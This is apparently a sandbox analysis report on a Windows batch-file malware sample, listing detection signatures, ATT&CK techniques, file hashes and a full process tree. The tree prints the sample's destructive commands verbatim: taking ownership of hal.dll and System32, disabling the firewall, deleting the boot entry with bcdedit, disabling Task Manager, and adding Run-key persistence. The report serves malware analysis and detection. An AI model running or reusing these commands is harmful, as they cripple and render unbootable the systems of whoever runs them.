bc46f8abc7da6b52a9ff6fff841c0ff989174f06cd1787d9fb55e0afbac1b77e

Analysis

max time kernel
48s
max time network
102s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08/07/2024, 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.cmd
Size

22KB
MD5

875e1190ed85a65570ee53a82a5cacb3
SHA1

8a6c6400eb74847dd4038eb086f1aceb695e2e25
SHA256

bc46f8abc7da6b52a9ff6fff841c0ff989174f06cd1787d9fb55e0afbac1b77e
SHA512

764f8faaeb71f297762be3a38ea340a9da5300eb7213ca03c803219f0496317b3d916648f8a6cac00f299be3bb69db268cf5e22b6ea2d01a6b233b341084466e
SSDEEP

384:2XJdAbrM21q0j0L1qEzdQ8PigfwTxX823JWo3yzKpMg:6bAUAW17JQrgodX/BMg

Score

8^/10

defense_evasion discovery evasion execution exploit upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2040	powershell.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3560	netsh.exe
3356	netsh.exe
4280	netsh.exe
208	netsh.exe

Possible privilege escalation attempt 37 IoCs

exploit

pid	Process
3600	takeown.exe
4064	icacls.exe
2112	icacls.exe
2560	takeown.exe
5896	takeown.exe
1364	takeown.exe
3432	icacls.exe
4500	icacls.exe
2248	takeown.exe
5436	takeown.exe
2596	takeown.exe
4024	icacls.exe
4780	takeown.exe
5848	takeown.exe
6012	icacls.exe
4012	takeown.exe
3388	icacls.exe
1292	icacls.exe
5892	icacls.exe
6060	icacls.exe
4568	takeown.exe
3488	takeown.exe
3612	takeown.exe
2020	takeown.exe
5880	takeown.exe
3468	icacls.exe
6100	icacls.exe
4884	takeown.exe
2652	takeown.exe
5512	takeown.exe
5592	takeown.exe
2548	icacls.exe
5832	takeown.exe
5832	takeown.exe
2344	takeown.exe
5956	icacls.exe
5992	icacls.exe

Executes dropped EXE 1 IoCs

pid	Process
1968	Tasksvc.exe

Modifies file permissions 1 TTPs 37 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3488	takeown.exe
2020	takeown.exe
5436	takeown.exe
4884	takeown.exe
1292	icacls.exe
2560	takeown.exe
4064	icacls.exe
3388	icacls.exe
1364	takeown.exe
2596	takeown.exe
4024	icacls.exe
5512	takeown.exe
5956	icacls.exe
5992	icacls.exe
5592	takeown.exe
5892	icacls.exe
5832	takeown.exe
6100	icacls.exe
5896	takeown.exe
2548	icacls.exe
3612	takeown.exe
4500	icacls.exe
4780	takeown.exe
2248	takeown.exe
6012	icacls.exe
3468	icacls.exe
6060	icacls.exe
4012	takeown.exe
2344	takeown.exe
3432	icacls.exe
5832	takeown.exe
5848	takeown.exe
3600	takeown.exe
2112	icacls.exe
5880	takeown.exe
4568	takeown.exe
2652	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023460-241.dat	upx
behavioral2/memory/1968-242-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/1968-254-0x0000000000400000-0x000000000040E000-memory.dmp	upx

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 4 IoCs

pid	Process
4248	bcdedit.exe
1496	bcdedit.exe
220	bcdedit.exe
3940	bcdedit.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\twain_32.dll	attrib.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1624	ipconfig.exe
3464	ipconfig.exe
2112	ipconfig.exe
428	ipconfig.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

T1112

pid	Process
4520	reg.exe
164	reg.exe
4468	reg.exe
3624	reg.exe
4536	reg.exe
3788	reg.exe
4400	reg.exe
3640	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4012	takeown.exe
Token: 33	1000	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1000	AUDIODG.EXE
Token: SeTakeOwnershipPrivilege	3600	takeown.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 4108	400	cmd.exe	84
PID 400 wrote to memory of 4108	400	cmd.exe	84
PID 400 wrote to memory of 1968	400	cmd.exe	86
PID 400 wrote to memory of 1968	400	cmd.exe	86
PID 400 wrote to memory of 1968	400	cmd.exe	86
PID 400 wrote to memory of 4012	400	cmd.exe	88
PID 400 wrote to memory of 4012	400	cmd.exe	88
PID 400 wrote to memory of 2548	400	cmd.exe	89
PID 400 wrote to memory of 2548	400	cmd.exe	89
PID 400 wrote to memory of 1076	400	cmd.exe	90
PID 400 wrote to memory of 1076	400	cmd.exe	90
PID 400 wrote to memory of 3600	400	cmd.exe	94
PID 400 wrote to memory of 3600	400	cmd.exe	94
PID 400 wrote to memory of 4064	400	cmd.exe	95
PID 400 wrote to memory of 4064	400	cmd.exe	95
PID 400 wrote to memory of 772	400	cmd.exe	96
PID 400 wrote to memory of 772	400	cmd.exe	96

Views/modifies file attributes 1 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
772	attrib.exe
4296	attrib.exe
1508	attrib.exe
4220	attrib.exe
6060	attrib.exe
6060	attrib.exe
1076	attrib.exe
804	attrib.exe
6032	attrib.exe
6116	attrib.exe
5984	attrib.exe
4308	attrib.exe
1644	attrib.exe
4552	attrib.exe
3360	attrib.exe
3108	attrib.exe
3464	attrib.exe
6076	attrib.exe
5884	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
1⤵
- Drops autorun.inf file
- Suspicious use of WriteProcessMemory
PID:400
- C:\Windows\system32\certutil.exe
  certutil -decode "Bytebeat.sk" "Tasksvc.exe"
  2⤵
  PID:4108
- C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
  "Tasksvc.exe"
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\hal.dll"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4012
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\hal.dll" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2548
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\hal.dll"
  2⤵
  - Drops file in System32 directory
  - Views/modifies file attributes
  PID:1076
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\Twain_32.dll"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\Twain_32.dll" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4064
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\Twain_32.dll"
  2⤵
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:772
- C:\Windows\system32\reg.exe
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
  2⤵
  PID:1284
- C:\Windows\system32\rundll32.exe
  rundll32 user32.dll, SwapMouseButton
  2⤵
  PID:4904
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:4468
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3624
- C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  2⤵
  - Modifies Windows Firewall
  PID:208
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\Admin\AppData\Local\Temp\MouseMove.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K Taskdl.bat
  2⤵
  PID:1972
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2344
- C:\Windows\system32\wscript.exe
  WScript Informacion.vbs
  2⤵
  PID:4764
- C:\Windows\system32\ipconfig.exe
  ipconfig /release
  2⤵
  - Gathers network information
  PID:3464
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h *.*
  2⤵
  - Views/modifies file attributes
  PID:4296
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1376
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:2348
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:3372
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:3312
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1984
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:3724
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1568
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:540
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:4784
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:3908
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4568
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3388
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:4308
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2020
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4024
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:1644
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:3776
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:3840
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4536
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3356
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:1788
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2248
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:2832
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1624
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:804
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5368
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5416
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5472
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5536
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5600
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5656
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5668
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5744
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5796
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5924
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5648
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4392
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4560
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2916
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3488
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2112
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:1508
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2596
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1292
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:4552
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:804
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:856
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4400
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3560
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:4468
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2652
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:1904
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2112
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:3108
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4536
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:408
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3640
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:404
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1820
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4772
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3292
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4820
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3488
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4280
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5880
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6012
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6116
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5832
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6100
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5984
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:3184
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5848
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5992
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6076
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5592
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5892
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:6060
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:1032
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5832
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5956
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6032
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2560
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3468
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5884
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5144
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5512
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2272
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3612
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3432
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:4220
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4884
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4500
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:3360
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2932
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:3748
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3788
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:164
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4280
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:2616
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4780
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:3904
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:428
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:3464
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1440
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2164
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4800
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5028
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4240
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3844
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2828
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5156
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5272
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6140
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5436
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6060
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6060
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5616
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6076
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5200
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5896
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:3356
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\drivers" /r
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1364

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d8 0x514
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
